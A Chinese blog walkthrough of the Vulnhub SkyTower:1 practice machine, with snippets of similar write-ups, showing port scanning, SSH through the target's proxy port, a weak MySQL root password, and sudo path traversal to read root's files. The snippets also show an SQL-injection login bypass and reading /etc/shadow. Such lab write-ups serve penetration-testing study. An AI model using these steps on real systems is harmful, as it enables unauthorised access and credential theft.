Vulnhub:SkyTower:1靶机

已于 2023-03-19 20:51:08 修改
阅读量212 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 安全 网络安全
于 2023-03-19 20:48:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/129656215
该文章描述了一次渗透测试过程,首先对目标IP192.168.111.236进行了信息收集和端口扫描,利用nmap进行http枚举。接着,通过代理配置连接目标的SSH服务,尝试了弱口令登录MySQL获取其他用户密码。然后,使用用户sara的sudo权限查看root目录文件,最终通过flag.txt找到了root密码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

kali:192.168.111.111

靶机:192.168.111.236

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.236

绕过登录验证

得到用户账号密码

修改/etc/proxychains4.conf,把代理指向目标的3128端口

通过代理连接目标ssh

proxychains4 ssh john@192.168.111.236 -t "/bin/sh"

提权

使用弱口令:root|root,登录mysql,得到另外两个用户的密码

使用用户sara登录ssh

proxychains4 ssh sara@192.168.111.236 -t "/bin/sh"

sara的sudo权限

使用ls查看root家目录下的文件

sudo -u root /bin/ls /accounts/../root/

查看flag.txt,获得root的密码

sudo -u root /bin/cat /accounts/../root/flag.txt

ctostm
关注
渗透测试靶机----SkyTower
久恙502的博客
01-17 2123
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
vulnhub系列:SkyTower1
jq_j37的博客
08-01 435
vulnhub系列:SkyTower1靶机,打靶文章
VulnHub靶机-SkyTower
Slow_的博客
02-26 903
VulnHub靶机-SkyTower 下载地址:https://www.vulnhub.com/entry/skytower-1,96/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 环境: 攻击机和靶机均在192.168.8.0段 攻击机:kali linux 192.168.8.108 文章目录VulnHub靶机-SkyTower一、信息搜集二、提权 一、信息搜集 要想渗透靶机,首先得知道靶机的IP是什么,我们先用nmap探测存活主机。 命令:nmap -sP 19
vulnhub靶场SkyTower靶场
zzzzzzkeai的博客
12-08 699
vulnhub靶场--SkyTower靶场
skytower靶机
weixin_74232792的博客
07-31 359
用同样的方式列举root目录下的文件 sudo /bin/ls /accounts/../../../root/,发现有个flag文件,查看一下,有root用户的密码,直接切换root,成功提权。发现在accounts目录下有root权限,用以下命令查看shadow文件,cat /accounts/../etc/shadow。转换其他思路,想到刚才扫到了一个代理端口,并且开放了ssh,尝试用这个账号密码连接一下。切换从数据库中发现的其他用户,Sara用户是可以ssh连接的,另外一个不行。
SkyTower靶机
m0_61995767的博客
07-30 1857
KeyTower打靶记录
vulnhubSKYTOWER: 1靶场
最新发布
12-28
### 关于 VulnHubSKYTOWER: 1靶机信息 #### 靶机概述 SKYTOWER: 1 是一款发布在 VulnHub 平台上用于学习和练习渗透测试技能的虚拟机镜像。这款机器旨在提供给安全爱好者和技术人员一个模拟真实世界漏洞利用...
小白的靶机VulnHub-SkyTower
wo41ge的博客
12-28 565
靶机地址:https://www.vulnhub.com/entry/skytower-1,96/ 开机界面 就是个这 同样是使用桥接 找到了此次CTF目标计算机IP地址:192.168.56.101 开放了22(filtered)、80、3128代理端口…盒子都有代理… 先访问网页试试 这边 直接 进行测试 发现 是可以sql注入的 得到用户名和密码 Username: john Password: hereisjohn 尝试 ssh 登录 发现 是不可以的 但是根据nmap扫出的结果 它是开了代
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3460
每台都做一做,然后记录在博客里.供自己和大家一起学习.
vulnhub SkyTower: 1
箭雨镜屋
12-21 3137
本文思路: nmap扫描端口---->万能密码登录web,拿到john的ssh密码----->通过代理连接ssh,得到john的shell---->linpeas.sh扫描发现mysql---->通过mysql得到其他用户ssh账户密码---->用sara用户登录并通过sudo命令提权(找到root的密码)
VulnHub靶机渗透:SKYTOWER: 1
Mysmycbx的博客
06-24 830
靶机IP:192.168.56.101发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。1、SQL注入时需要通过提示信息修改注入代码,完成绕过。2、当获得到ssh密码后,发现ssh端口无法登录时,可以查看代理服务。3、使用proxytunnel代理软件,完成代理服务。使用proxytunnel,使用-p参数指定192.168.56.101:3128代理,使用-d指定目标为 192.168.56.101:22端口,映射到本地kali的6666端口。4、
vulnhub-SKYTOWER: 1靶场夺旗之战
shulao2010的博客
06-11 367
成功登录成功,但是好像没进系统,用我满级英语水平翻译了一下,大概是,你已经被公司停职了,没啥用了,给你2美元*7=14块人民币,玩去吧,但是你想得到这2块钱,还得ssh登录,要不2块钱都拿不到。ssh进行连接时,超时,仔细一看nmap扫描结果,大爷的,是过滤状态,说明端口没有明确信息表明是开启还是关闭,但是没有关闭,说明有戏,但是无法访问。此时只剩下3128端口,这个是一个代理服务,那么很有可能,22端口,需要经3128服务代理之后才能访问。那咋整,蚊子也是肉,我们直接利用用户名密码尝试ssh登录。
vuluhub-skytower-1渗透靶场SkyTower 1
ccccai22的博客
08-04 408
vuluhub-skytower-1渗透靶场SkyTower 1提权
VulhubSkyTower靶机详解
weixin_62457642的博客
09-17 817
靶机SkyTower速刷
SKYTOWER: 1超详细靶机实战
weixin_68615160的博客
07-31 790
下载之后解压发现是VirtualBox格式的我们下载一个VirtualBox,这是官网安装到默认路径就行打开后点击注册选择解压后的vbox文件然后点击左上角管理点击导出虚拟电脑,选中后下一步更改路径,然后一直下一步就得到了一个iso镜像文件用vmware打开默认网卡模式为仅主机,更改为nat模式。
SkyTower靶机复现
weixin_52956666的博客
07-31 594
发现ssh登陆失败,扫描端口的时候22端口状态不是open,但是3128端口开放, 是http-proxy是代理端口。因为有后台,所以数据库大概率有账号密码,cat /var/www/login.php。将网卡模式设置为仅主机模式,混杂模式设置为全部允许,并记录MAC地址。加入 ' || 1=1#进行闭合,发现闭合成功,并且爆出了账号密码。同理,vim /etc/proxychains4.conf 也一样。尝试构造sql注入,发现有报错回显,说明存在sql注入。点击注册,将靶机资源加入进入,点击启动。
SkyTower靶机渗透测试
weixin_58786230的博客
07-31 372
【代码】SkyTower靶机渗透测试。
SkyTower 靶机 - 详细流程
m0_73983897的博客
09-20 1365
流程:主机发现 - 端口扫描 - web渗透 - 获取shell - 权限提升 web渗透:在发现SQL注入后,首先尝试的便是Sqlmap利用,但无果,原因是数据库拒绝了外部连接;设置代理访问这块,提示的很明显,毕竟在网页上直接写着....proxychains ssh john@192.168.142.145 -t "命令"通过ssh的-t参数执行命令,算比较少见的,这里也可以执行系统命令,反弹shell等权限提升:期间也有直接利用cat包含。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值